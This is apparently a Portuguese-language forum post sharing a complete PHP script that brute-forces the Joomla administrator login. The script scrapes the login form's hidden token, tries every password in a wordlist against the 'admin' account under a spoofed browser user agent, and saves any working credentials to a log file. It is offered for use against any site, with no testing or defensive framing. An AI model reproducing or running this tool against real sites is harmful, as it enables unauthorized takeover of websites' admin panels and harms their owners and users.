Início
Fala folks! 
Brute em joomla para versões atualizadas.
Uso:
Code:
Brute em joomla para versões atualizadas.
Uso:
- Código:
php joomla_brute.php site pass_file
Code:
- Código:
<?php
/**
*
* Joomla Brute By "N4sss"
*
* Use: php joomla_brute.php site pass_file
* Last release bruted: 3.3.0
* OOP to better manipulation of data. Edit if you want :)
*
* Contact: n-l4b[noSPAM]hotmail[dot]com
*
*
**/
set_time_limit(0);
error_reporting(E_ALL);
Class JoomlaBrute{
var $user = 'admin';
var $log = 'ok_joomla.txt';
var $regex = '#<input type=\"hidden\" (.*?)/>#';
var $hashRegex = '#name=\"(.*?)\" value=\"1\"#';
var $returnRegex = '#name=\"return\" value=\"(.*?)\"#';
var $cookieContainer = 'nx.cookie';
var $timeout = 5;
var $path = '/administrator/index.php';
var $userAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0';
var $url = null;
var $wordlist = null;
var $httpResponse = null;
var $date = null;
var $hash = null;
var $returnValue = null;
function __construct($url, $wordlist){
$this->url = $url;
$this->wordlist = $wordlist;
printf("\nPHP Joomla Brute by n4sss\n\n- Uri: %s\n- User: %s\n- Wordlist: %s\n- Log: %s\n\n Wait and Good Luck!\n\n", $this->url, $this->user, $this->wordlist, $this->log);
$this->post();
}
function __destruct(){
unlink($this->cookieContainer);
printf("Finished!\n");
flush();
}
function save_buf($content, $file){
$fp = fopen($file, "a+");
fwrite($fp, $content."\r\n");
fclose($fp);
}
function connect(){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->url.$this->path);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookieContainer);
curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookieContainer);
curl_setopt($ch, CURLOPT_USERAGENT, $this->userAgent);
curl_setopt($ch, CURLOPT_TIMEOUT, $this->timeout);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->timeout);
$this->httpResponse = curl_exec($ch);
}
function parse_connection(){
$this->connect();
preg_match_all($this->regex, $this->httpResponse, $parse);
preg_match_all($this->hashRegex, $parse[1][3], $parse_hash);
preg_match_all($this->returnRegex, $parse[1][2], $parse_returnValue);
foreach($parse_hash[1] as $this->hash);
foreach($parse_returnValue[1] as $this->returnValue);
if(!$this->hash || !$this->returnValue) exit('[-] Impossible to retrieve login hash\nExiting!\n');
flush();
}
function post(){
$this->parse_connection();
$this->date = date("F j, Y, H:i:s a");
if(!preg_match("/http/", $this->url)) $this->url = "http://".$this->url;
$uri = $this->url.$this->path;
$wordlist = array_filter(explode("\n", file_get_contents($this->wordlist)));
foreach($wordlist as $password){
$postContent = "username={$this->user}&passwd={$password}&lang=&option=com_login&task=login&return={$this->returnValue}&{$this->hash}=1";
printf("%s %s:%s\n", $this->url, $this->user, $password);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $uri);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookieContainer);
curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookieContainer);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $this->userAgent);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postContent);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->timeout);
$this->httpResponse = curl_exec($ch);
if(preg_match("/com_config/", $this->httpResponse)){
$response = "+-----------------------+\n";
$response .= "[Uri] {$uri}\n";
$response .= "[Auth] {$this->user}:{$password}\n";
$response .= "[Date] {$this->date}\n";
$response .= "+-----------------------+\n";
print "{$response}\n";
$this->save_buf($response, $this->log);
flush();
break;
}
}
}
}
if(isset($argv[1], $argv[2])){
$host = trim($argv[1]);
$wordlist = trim($argv[2]);
$joomlaBrute = new JoomlaBrute($host, $wordlist);
}else{
printf("php %s host wordlist\n", $argv[0]);
}
?>
